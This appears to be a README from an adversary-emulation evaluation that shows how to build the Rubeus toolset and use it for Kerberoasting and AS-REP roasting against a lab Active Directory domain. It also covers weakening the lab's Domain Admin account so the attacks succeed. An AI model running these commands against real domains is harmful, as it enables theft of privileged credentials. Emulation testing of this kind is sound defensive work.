# Rubeus

"Rubeus is a C# toolset for raw Kerberos interaction and abuses."

The goal for this evaluation is to steal the hash of the Domain Admin as a Domain User.

# Build Instructions

Open the command prompt (cmd.exe), navigate to directory containing the Rubeus Visual Studio solution file (Rubeus.sln), and run the devenv.exe command:

cd wizard_spider\Resources\Rubeus
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe" Rubeus.sln /build Release

# alternate build command
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\msbuild.exe" Rubeus.sln -property:Configuration=Release

The executable will be found in the bin\Release folder.

# Test Instructions

Open PowerShell

cd wizard_spider\Resources\Rubeus\
rubeus_test.ps1

# Usage Examples 

# execute AS-Rep Roast
rubeus.exe asreproast /domain:oz.local

# execute Kerberoast
# must be executed as a domain user (oz\user) NOT a local user (dorothy\user)
# may want to consider adding /format:hashcat as an argument (default format is John)
rubeus.exe kerberoast /domain:oz.local

# Cleanup Instructions

Open a command prompt or PowerShell

del rubeus.exe

# Misc

Conditions required to successfully compromise the Domain Admin password via Kerberoasting during the evaluation:

  • The Domain Admin must have a crackable password

  • The Domain Admin must have a Service Principal Name (SPN) associated with their account

      # Example command to set the SPN: 
  setspn -s exchange/oz.local oz/kfleming

Additionally, the CTI indicates the adversary also attempts AS-Rep Roasting. For this to work, Kerberos pre-authentication must be disabled (not done by default).

Log into Domain Controller 
Run (Windows-R) dsa.msc 
Select Domain Admin account 
Go to the Account tab 
In account options, check 'Do not require Kerberos preauthentication'

# CTI Evidence

https://attack.mitre.org/groups/G0102/
https://thedfirreport.com/2020/10/08/ryuks-return/
https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

# References

https://github.com/GhostPack/Rubeus
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spn-setspn-syntax.aspx
https://blog.zsec.uk/path2da-pt2/
https://docs.microsoft.com/en-us/visualstudio/ide/reference/build-devenv-exe?view=vs-2019